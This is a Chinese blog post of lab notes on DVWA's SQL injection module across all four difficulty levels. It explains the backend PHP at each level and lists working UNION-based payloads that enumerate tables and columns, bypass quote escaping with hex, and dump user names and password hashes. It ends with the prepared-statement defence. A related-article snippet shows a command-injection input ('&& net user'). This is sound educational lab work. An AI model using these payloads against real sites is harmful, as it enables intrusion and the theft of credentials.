Dvwa之sql注入low到impossible级别详解

最新推荐文章于 2024-05-12 12:01:50 发布
最新推荐文章于 2024-05-12 12:01:50 发布
阅读量9.3k 收藏 49
点赞数 9
分类专栏: web渗透 dvwa
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Cai1010110/article/details/102734879
版权

在这里我所使用的的是Windows 10系统,dvwa+phpstudy_pro进行靶场练习,关于dvwa的介绍网上一搜一大把,在这里就不加以介绍了,我还是把实践内容介绍好吧!我从网上搜到各位大神操作步骤进行整理学习。

本文介绍SQL Injection的相关内容,后续内容会在之后的文章继续介绍。

小白学习中......

Low

后端控制代码

后端代码解析

1、isset()函数在php中用来检测变量是否设置,该函数返回的是布尔类型的值,即true/false

2、$_REQUEST用来收集HTML表单提交的数据,点击‘submit’按钮提交表单数据

3、query变量为直接构造的sql查询语句,没有对用户的输入进行任何的过滤,导致sql注入的存在。

4、result通过mysqli_query()函数获取数据库查询的结果集。die()函数表示连接数据库失败退出当前脚本。$GLOBALS["___mysqli_ston"]表示数据库的连接语句

5、mysqli_fetch_assoc($result)从结果集中取出一行作为关联数组,即列名和值对应的键值对。

6、最后通过while判断若有查询结果且循环执行$row = mysqli_fetch_assoc( $result ),将结果集中每行结果对应的字段值赋值给相应的字段,并遍历输出。

7、mysqli_close() 函数关闭先前打开的数据库连接。

8、$GLOBALS["___mysqli_ston"]表示数据库的连接语句

9、被包围在 <pre> 标签 元素中的文本通常会保留空格和换行符。而文本也会呈现为等宽字体。

10、or  (x or y)如果 x 和 y 有且仅有一个为 true,则返回 true

具体了解菜鸟教程:PHP网站(https://www.runoob.com/php/php-tutorial.html)和MySQL网站(https://www.runoob.com/mysql/mysql-tutorial.html)

先确定正常和不正常的回显

回显,就是显示正在执行的批处理命令及执行的结果等。

输入1时,有回显,是正常的

 

输入“2”,回显正常

 

输入6时,没有回显。

从1~5是查询成功的,而5以后,却不显示,说明有5个用户

判断是否存在注入点

我先尝试数字型注入:“ ’ ”,“and 1=1”,“and 1=2”

首先输入“ ’ ”,查询报错:

 

首先输入“1 and 1=1”,查询成功:

 

当输入“1 and 1=2”的时候,查询成功:

通过注入发现该注入为数字型,而不是字符型

列字段

使用命令:1' or 1=1 order by 1 # 、 1' or 1=1 order by 2 # 、1' or 1=1 order by 3 # ,查询成功。

#是注释符号

当输入“1' or 1=1 order by 1 #”时,查询成功:

当输入“1' or 1=1 order by2 #”时,查询成功:

 

当输入“1' or 1=1 order by 3 #”时,查询报错:

说明执行的sql查询语句中只有两个字段,即这里的First name、Surname.

猜测表名

使用命令:1' union select 1, group_concat(table_name) from information_schema.tables where table_schema=database()#,查询成功:

 

 

 

猜测列名

使用命令:1' union select 1, group_concat(column_name) from information_schema.columns  where table_schema=’users’#,查询成功:

 

猜用户密码

使用命令:1' union select null, concat_ws(char(32,58,32),user,password) from users#,查询成功:

 

判断数据库版本

使用命令:1' union select version(),2# ,版本信息大5.0,说明有数据库,可爆出:information_schema  ,查询成功:

获取数据库名称、用户

使用命令:1' union select database(),user()#,查询成功:

爆出dvwa里面的所有表名

使用命令:1' union select table_name,2 from information_schema.tables where table_schema = 'dvwa'#,查询成功:

爆出users表里面的所有列名

使用命令:1' union select column_name,2 from information_schema.columns where table_name = 'users'#,查询成功:

爆出use和password列里面的数据

使用命令:1' union select user,password from users#  ,查询成功: 但是这个命令需要MD5进行解密(https://pmd5.com/)

 

Medium

该级别需要burpsuite抓包来进行演练

后端控制代码

可以看到,Medium级别的代码利用mysql_real_escape_string函数对特殊符号

\x00,\n,\r,\,’,”,\x1a进行转义,同时前端页面设置了下拉选择表单,希望以此来控制用户的输入。

后端代码解析

在low级别中,个别语句已经介绍,在这里就不一一展示,在这里展示一些low级别中未出现的。

1、$_POST接受表单以POST方式传递过来的变量

2、mysqli_real_escape_string() 函数转义在 SQL 语句中使用的字符串中的特殊字符。

3、mysqli_error() 函数返回最近调用函数的最后一个错误描述。

4、is_object() 函数用于检测变量是否是一个对象。如果指定变量为对象,则返回 TRUE,否则返回 FALSE。

5、$_mysqli_res可能是其中的一个定义,有可能是res=result  这个是我自己的判断

6、mysqli_connect_error() 函数返回上一次连接错误的错误描述。

界面

界面中有列表,该列表表示5个用户和low其实是一样的。

判断是否存在注入点

抓包更改参数id为1’ or 1=1 #,查询报错:

修改抓包参数id为1 or 1=1 #,查询成功:

 

说明存在数字型注入。(由于是数字型注入,服务器端的mysql_real_escape_string函数就形同虚设了,因为数字型注入并不需要借助引号)

 

查询sql查询语句中的字段数

抓包更改参数id为1 order by 2 #,查询成功:

抓包更改参数id为1 order by 3 #,查询报错:

说明执行的sql查询语句中只有两个字段,即这里的First name、Surname。

确定显示的字段顺序

抓包更改参数id为1 union select 1,2 #,查询成功:

获取当前数据库

抓包更改参数id为1 union select 1,database() #,查询成功:

说明当前的数据库为dvwa。

获取数据库中的表

抓包更改参数id为1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #,查询成功:

说明数据库dvwa中一共有两个表,guestbook与users。

获取表中的字段名

抓包更改参数id为1 union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’  #,查询报错:

这是因为单引号被转义了,变成了\’。

可以利用16进制进行绕过,抓包更改参数id为1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0×7573657273 #,查询成功:

说明users表中有8个字段,分别是user_id,first_name,last_name,user,password,avatar,last_login,failed_login。

爆出数据

抓包修改参数id为1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #,该操作依然需要MD5进行解密,查询成功:

这里就爆出users表中所有的用户的user_id,first_name,last_name,password的数据。

High

后端控制代码

可以看到,与Medium级别的代码相比,High级别的只是在SQL查询语句中添加了LIMIT 1,希望以此控制只输出一个结果。

后端代码解析

1、$_SESSION 存储和取回 session 变量的正确方法是使用 PHP $_SESSION 变量:

2、LIMIT 1  limit N:返回N条记录

3、is_null() 函数用于检测变量是否为 NULL。如果指定变量为 NULL,则返回 TRUE,否则返回 FALSE。

漏洞利用

抓包更改参数id为1' or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #,该操作依然需要MD5解密,查询成功:

 

需要特别提到的是,High级别的查询提交页面与查询结果显示页面不是同一个,也没有执行302跳转,这样做的目的是为了防止一般的sqlmap注入,因为sqlmap在注入过程中,无法在查询提交页面上获取查询的结果,没有了反馈,也就没办法进一步注入。

Impossible

后端控制代码

Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,同时只有返回的查询结果数量为一时,才会成功输出,这样就有效预防了“脱裤”,Anti-CSRFtoken机制的加入了进一步提高了安全性。

后端代码解析

1、$_GET收集来自表单中的值

2、user_token:用户token

3、is_numeric()函数用于检测变量是否为数字或数字字符串。

4、prepare ()准备要执行的SQL语句并返回一个 PDOStatement 对象

5、bindParam () 绑定一个参数到指定的变量名

6、execute()方法返回对象

7、fetch是一种HTTP数据请求的方式,是XMLHttpRequest的一种替代方案。

8、rowCount — 返回受上一个 SQL 语句影响的行数

generateSessionToken()和CSRF相关联,在这里我也不清楚,我会在以后的时间继续完成

总结

Low、medium和high这三个等级,实际上做法是一样的,只是说他们的提交方式不同,low是get型,medium是post型,high是在一个页面输入,另外一个页面显示,但是是一样的。不过网上说high级别的是防止一般sqlmap注入,而impossible则更加高级。

感谢网上的各位大神分享sql注入的操作步骤和学习心得

参考网站:https://www.e-learn.cn/content/qita/2319755

https://blog.csdn.net/wjy9649/article/details/78844382

https://www.freebuf.com/articles/web/120747.html

https://www.ucloud.cn/yun/32412.html

https://blog.csdn.net/csdn_Pade/article/details/82854764

——!!!——
关注
  • 9
    点赞
  • 49
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入low级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
代码审计实战—DWVA-sql-impossible
王嘟嘟的博客
10-18 406
0x00 前言 如饥似渴的学习ing。 前置章节 https://blog.csdn.net/qq_36869808/article/details/83029980 0x01 start 1.白盒测试 impossible是说不可能的意思,所以我们就直接进行白盒测试。 先来看下关键代码: $id = $_GET[ 'id' ]; // Was a number entered? if(is...
命令注入: DVWA级别分别设置Low、Medium、High、Impossible 进行命令注入
彭淦淦的博客
05-09 5219
2.2 步骤 实现此案例需要按照如下步骤进行。 步骤一:DVWA级别设置Low 1)访问DVWA,选择Low级别,然后点击“Command Injection”,如图-15所示 图-15 2)输入192.168.111.142并提交,正常显示结果,如图-16所示 图-16 3)输入192.168.111.142&&net user并提交,爆出了用户名,如图-17所示 图-17 步骤二:DVWA级别设置Medium 1)访问DVWA,选择Medium级别,然后点
DVWA通过攻略之SQL注入_dvwa sql注入(1)
最新发布
2401_84968303的博客
05-12 1146
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
dvwa靶场
ing_end的博客
02-26 6259
dvwa靶场 Brute Force (Low) Brute Force,即暴力(破解),是指黑客利用密码字典,使用穷举法猜解出用户口令,是现在最为广泛使用的攻击手法之一。 法一:暴力破解 先随便输一个账号密码不能通过 此时我们进行抓包 通过BP利用字典爆破,得出密码 根据长度的不同可得知password为密码 (medium) 源码分析: <?php if( isset( $_GET[ 'Login' ] ) ) { // Sanitise username input $us
dvwa命令注入impossible代码审计
x15wda33的博客
06-09 290
有兴趣,请查阅网络安全相关书籍简单的说是攻击者在受害人不知情情况下伪造了受害人网站的cookie,并利用该cookie对服务器进行访问从而窃取受害人的相关信息1、用户C打开浏览器,访问受信任网站A,输入用户名和密码请求登录网站A;2、在用户信息通过验证后,网站A产生Cookie信息并返回给浏览器,此时用户登录网站A成功,可以正常发送请求到网站A;3、用户未退出网站A之前,在同一浏览器中,打开一个TAB页访问网站B;4、网站B接收到用户请求后,返回一些攻击性代码,并发出一个请求要求访问第三方站点A。
[网络安全] DVWASQL注入Impossible level代码审计
热门推荐
等风来
04-26 1万+
使用 execute() 方法执行查询,使用 fetch() 方法获取查询结果中第一行的数据,并将其存储到 $row 数组中。然后判断 $data->rowCount() 的值是否为 1,确保只有一个结果被返回. 在 SQLite 中,使用全局变量 $sqlite_db_connection 获取 SQLite 数据库连接对象,并使用 prepare() 方法准备 SQL 查询语句,在其中使用占位符 :id 代替 id 参数。 使用 bindValue() 方法将 id 参数绑定到占位符上,指定参数类型
2019-2-28 dvwa学习(4)--sql注入级别impossible
weixin_42555985的博客
02-28 4963
继续把dvwa环境安全级别调整为impossible 观察界面 看上去似乎和low级别没有大的区别,只是浏览器中get方法提交的参数多了一个。 impossible.php代码如下 &amp;lt;?php if( isset( $_GET[ 'Submit' ] ) ) { // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_...
dvwa问题篇 -- 文件上传卡在impossible最高级模块,设置的其它等级将会无效 -- 小黑解决教程
G_WEB_Xie的博客
12-27 456
各位小伙伴初次玩dvwa会出现各种问题,本来想把一些问题直接总结写一篇dvwa文章来着,但因为都是关键字搜索,所以将一些问题都拆分出来,以便大家方便查类似问题。(大家有遇到不一样的问题欢迎投稿!将所有打开过的dvwa的浏览器清除缓存,然后先进入本地目录 -- > dvwa -->登录 按照这个顺序的登录,再设置low级别测试。文件上传时候出现一个问题,就是有时候它会卡在impossible最高级模块,设置的其它等级将会无效。
DVWA下的SQL注入
07-25
SQL
2020-12-06-DVWA之sql.md
01-24
dvwa之sql
学习之sql注入漏洞网址的创建
06-06
这篇文章的主题是“学习之sql注入漏洞网址的创建”,它旨在帮助初学者或研究人员建立一个自定义的环境来模拟SQL注入攻击,以便于理解和实践防御措施。下面将详细介绍这个过程以及涉及的相关知识点。 首先,SQL注入...
sql注入渗透测试工具:sqlol/DVWA
04-24
sql注入渗透测试工具:sqlol/DVWA https://xianjie0318.blog.csdn.net/article/details/112987555?spm=1001.2014.3001.5502
DVWASQL注入
RexHa的博客
09-27 1838
DVWA靶场sql注入三个级别通关
dvwa无法修改更改等级 一直impossible 已解决
滕青山博客
02-14 4447
问题 在DVWA Security中将等级修改成了low,但是某个模块还是impossible 解决 假设同时在火狐和谷歌登录了admin账号。火狐运行正常,可是谷歌无法将某个模块修改成low。 解决方法就是:两个浏览器同时退出账号,并在谷歌上删除缓存,或者稍等片刻,打开无痕窗口并访问你的ip或域名/dvwa 这里不要加上/vulnerabilities/某个模块名/ 登录后再次设置安全等级成low即可。 参考:[求助]新人求助!!为什么我将DVWA级别调为low了,但是在用burpsuit
dvwa靶场sql injection学习笔记(lowimpossible
qq_62935780的博客
11-02 291
学习dvwa靶场sql注入的一些经验
Kali渗透测试之DVWA系列(四)——使用Burp Suite进行SQL Injection(Blind)(SQL盲注,包括盲注脚本)
weixin_45116657的博客
08-25 4482
目录: 一、SQL盲注 SQL盲注与SQL注入的区别; SQL盲注的过程; 二、实验环境 三、实验过程 基于布尔值的盲注; 基于时间的盲注; 一、SQL盲注简介 1、SQL盲注: 盲注:SQL Injection(Blind),即SQL盲注,目标只会回复是或不是,没有详细内容; 注入:可以查看详细的内容 2、手工盲注思路: 手工盲注的过程,就像你和机器人聊天一样,这个机器人知道的...
DVWA 之 XSS(stored)存储型XSS
RexHa的博客
10-08 1970
dvwa 存储型XSS
DVWA-impossible代码审计
来日可期的博客
10-19 543
DVWA-impossible代码审计
dvwasql注入(低级)
12-21
DVWA(Damn Vulnerable Web Application)是一个用于学习和测试Web应用程序安全的漏洞测试平台。其中包含了不同级别的漏洞,包括SQL注入SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过在输入字段中插入恶意的SQL代码来执行未经授权的数据库操作。 在DVWA中进行SQL注入(低级)的操作如下: 1. 打开DVWA平台并登录。 2. 在左侧导航栏中选择"SQL Injection"。 3. 在"SQL Injection"页面中,选择"Low"级别。 4. 在页面上方的输入框中输入一个单引号(')并点击"Submit"按钮。 5. 页面将显示一个错误消息,表明存在SQL注入漏洞。 6. 在输入框中输入以下内容并点击"Submit"按钮: ``` 1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()# ``` 这个语句将获取当前数据库中所有表的名称。 7. 页面将显示一个包含表名的结果集。 通过以上步骤,你可以在DVWA平台上进行SQL注入(低级)的操作,并获取数据库中的表名。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值